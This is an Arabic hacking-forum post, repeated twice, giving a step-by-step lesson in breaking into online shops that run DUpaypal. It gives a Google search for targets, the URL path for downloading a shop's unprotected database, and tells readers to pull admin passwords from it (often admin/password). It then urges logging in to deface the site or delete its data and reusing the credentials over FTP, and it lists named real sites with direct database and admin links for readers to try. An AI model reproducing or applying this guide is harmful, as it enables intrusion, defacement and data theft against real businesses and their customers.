BLak hand
21-02-2005, 02:57 PM
بسم الله الرحمن الرحيم
كيف حالكم شباب هكر غبت عليكم كثير كنت مشغول في الهكر والكركر;)
دورتلكم احسن وافضل الدروس (( لكن زي ماقلتلكم بدينا ندخل في الغويط )):vereymad:
بنطبق نظام جديد يفيدكم ويتعبني:31: تعليقاتكم على الدروس الي اكتبها اكتبو معها الدروس الي تحتاجونها
مثل برنامج صعب عليكم اشرحه لكم او .............. اي شي في الهكر
الدرس الخامس (5)
شرح الثغره هو اختراق المواقع التجاريه حيث تقوم حذف قاعده البيانات و التعديل فيها ويعتبر ثغره خطيره
تاريخ اكتشاف الثغره يوم 9/2/2005 اي قريب ...
طريقة الاختراق ...
اولا اذهب الى الموقع الهكرز المفضل جوجل google وكتب Powered+by+DUpaypa
او النقر على اللينك المباشر Googel hackers (http://www.google.com/search?q=%22Powered+by+DUpaypal%22+-site%3Aduware.com&btnG=Search&hl=en&lr=&c2coff=1)
ثم راح تلقاء مئات الموقع اختار اي موقع واضيف لها الينك التالي
كود:
_private/DUpaypal.mdb
بيصير كذه
http://www.coralspringssales.com/We...te/DUpaypal.mdb (http://www.coralspringssales.com/Webs/Ecomm%202/_private/DUpaypal.mdb)
بعدين راح يظهر صفحه تحميل ملف اسمه DUpaypal.mdb حمله لا تخاف هو ملف مو فيروس..
حمله وافتحه بالاكسيس ...
وراح تلقاء زي الصوره التاليه ادخل ملف يوزر وطلع الباسورد
http://www.arabscastle.com/up/files/RooT%20YeMeN-1108237621.jpg
واحيانا يكون اليوزر والباسورد افتراضي اي admin والباسورد password
خلاص ياعم انبسط باقي خطوه
اضيف admin الى اللينك بيصير كذه
http://www.coralspringssales.com/Webs/Ecomm%202/admin (http://www.coralspringssales.com/Webs/Ecomm%202/admin)
تظهر يا خالو صفحه الدخول المدير في الصورة التاليه ...
http://www.arabscastle.com/up/files/RooT%20YeMeN-1108237952.jpg
خلاص الموقع في يدك سوي للي تحب تحط دعايه لك او تحذف قاعده البيانات
و تضيف تعديلات جديدة زي الصور التاليه :
http://www.arabscastle.com/up/files/RooT%20YeMeN-1108238179.jpg
وخلاص انا دخلت اضافه جديد وحطيت دعايه لي في الموقع وسويت زي الصوره التاليه
http://www.arabscastle.com/up/files/RooT%20YeMeN-1108238379.jpg
واذا تريد الاختراق الكامل للموقع ادخل عبر الاف تي بي وحط اليوزر والباسورد للي معك وراح تخترق الموقع بكله هذا بشرط اذا كان اليوزر والباسورد نفسه في FTP وعن نفسي زبط معي موقعين ...
ببرنامج WS-ftp طبعا ,,
,,,,,,
وهذي مواقع اخر جربو عليها ...
==================================
http://www.arespond.com/DUpaypal%20...te/DUpaypal.mdb (http://www.arespond.com/DUpaypal%203.1/_private/DUpaypal.mdb) الثغرة
http://www.arespond.com/DUpaypal%203.1/admin (http://www.arespond.com/DUpaypal%203.1/admin) الدخول عبر الادمن
================================================== =====
httprnbcraze.com/Store%20Front/_private/DUpaypal.mdb الثغرة
httprnbcraze.com/Store%20Front/admin الدخول عبر الادمن
================================================== ===
وهذا علشان عيونكم ..
http://www.bhuvanavijayam.com/bhuva...te/DUpaypal.mdb (http://www.bhuvanavijayam.com/bhuvana/products/_private/DUpaypal.mdb) الثغرة
http://www.bhuvanavijayam.com/bhuvana/products/admin (http://www.bhuvanavijayam.com/bhuvana/products/admin) الدخول عبر الادمن
================================================== ====
انتهى الدرس الخامس (5)
ارجو ان يكون في حسن ظنكم وانشالله اني قدرت اوصلكم المعلومه
لكن ياشباب التطبيق اهم شي في عالم الهكر:icon6:
BLAK hAnD
NeW2
VvvV_DRAKOLA_VvvV@hotmail.com
((انها البدايه فقط ))
كيف حالكم شباب هكر غبت عليكم كثير كنت مشغول في الهكر والكركر;)
دورتلكم احسن وافضل الدروس (( لكن زي ماقلتلكم بدينا ندخل في الغويط )):vereymad:
بنطبق نظام جديد يفيدكم ويتعبني:31: تعليقاتكم على الدروس الي اكتبها اكتبو معها الدروس الي تحتاجونها
مثل برنامج صعب عليكم اشرحه لكم او .............. اي شي في الهكر
الدرس الخامس (5)
شرح الثغره هو اختراق المواقع التجاريه حيث تقوم حذف قاعده البيانات و التعديل فيها ويعتبر ثغره خطيره
تاريخ اكتشاف الثغره يوم 9/2/2005 اي قريب ...
طريقة الاختراق ...
اولا اذهب الى الموقع الهكرز المفضل جوجل google وكتب Powered+by+DUpaypa
او النقر على اللينك المباشر Googel hackers (http://www.google.com/search?q=%22Powered+by+DUpaypal%22+-site%3Aduware.com&btnG=Search&hl=en&lr=&c2coff=1)
ثم راح تلقاء مئات الموقع اختار اي موقع واضيف لها الينك التالي
كود:
_private/DUpaypal.mdb
بيصير كذه
http://www.coralspringssales.com/We...te/DUpaypal.mdb (http://www.coralspringssales.com/Webs/Ecomm%202/_private/DUpaypal.mdb)
بعدين راح يظهر صفحه تحميل ملف اسمه DUpaypal.mdb حمله لا تخاف هو ملف مو فيروس..
حمله وافتحه بالاكسيس ...
وراح تلقاء زي الصوره التاليه ادخل ملف يوزر وطلع الباسورد
http://www.arabscastle.com/up/files/RooT%20YeMeN-1108237621.jpg
واحيانا يكون اليوزر والباسورد افتراضي اي admin والباسورد password
خلاص ياعم انبسط باقي خطوه
اضيف admin الى اللينك بيصير كذه
http://www.coralspringssales.com/Webs/Ecomm%202/admin (http://www.coralspringssales.com/Webs/Ecomm%202/admin)
تظهر يا خالو صفحه الدخول المدير في الصورة التاليه ...
http://www.arabscastle.com/up/files/RooT%20YeMeN-1108237952.jpg
خلاص الموقع في يدك سوي للي تحب تحط دعايه لك او تحذف قاعده البيانات
و تضيف تعديلات جديدة زي الصور التاليه :
http://www.arabscastle.com/up/files/RooT%20YeMeN-1108238179.jpg
وخلاص انا دخلت اضافه جديد وحطيت دعايه لي في الموقع وسويت زي الصوره التاليه
http://www.arabscastle.com/up/files/RooT%20YeMeN-1108238379.jpg
واذا تريد الاختراق الكامل للموقع ادخل عبر الاف تي بي وحط اليوزر والباسورد للي معك وراح تخترق الموقع بكله هذا بشرط اذا كان اليوزر والباسورد نفسه في FTP وعن نفسي زبط معي موقعين ...
ببرنامج WS-ftp طبعا ,,
,,,,,,
وهذي مواقع اخر جربو عليها ...
==================================
http://www.arespond.com/DUpaypal%20...te/DUpaypal.mdb (http://www.arespond.com/DUpaypal%203.1/_private/DUpaypal.mdb) الثغرة
http://www.arespond.com/DUpaypal%203.1/admin (http://www.arespond.com/DUpaypal%203.1/admin) الدخول عبر الادمن
================================================== =====
httprnbcraze.com/Store%20Front/_private/DUpaypal.mdb الثغرة
httprnbcraze.com/Store%20Front/admin الدخول عبر الادمن
================================================== ===
وهذا علشان عيونكم ..
http://www.bhuvanavijayam.com/bhuva...te/DUpaypal.mdb (http://www.bhuvanavijayam.com/bhuvana/products/_private/DUpaypal.mdb) الثغرة
http://www.bhuvanavijayam.com/bhuvana/products/admin (http://www.bhuvanavijayam.com/bhuvana/products/admin) الدخول عبر الادمن
================================================== ====
انتهى الدرس الخامس (5)
ارجو ان يكون في حسن ظنكم وانشالله اني قدرت اوصلكم المعلومه
لكن ياشباب التطبيق اهم شي في عالم الهكر:icon6:
BLAK hAnD
NeW2
VvvV_DRAKOLA_VvvV@hotmail.com
((انها البدايه فقط ))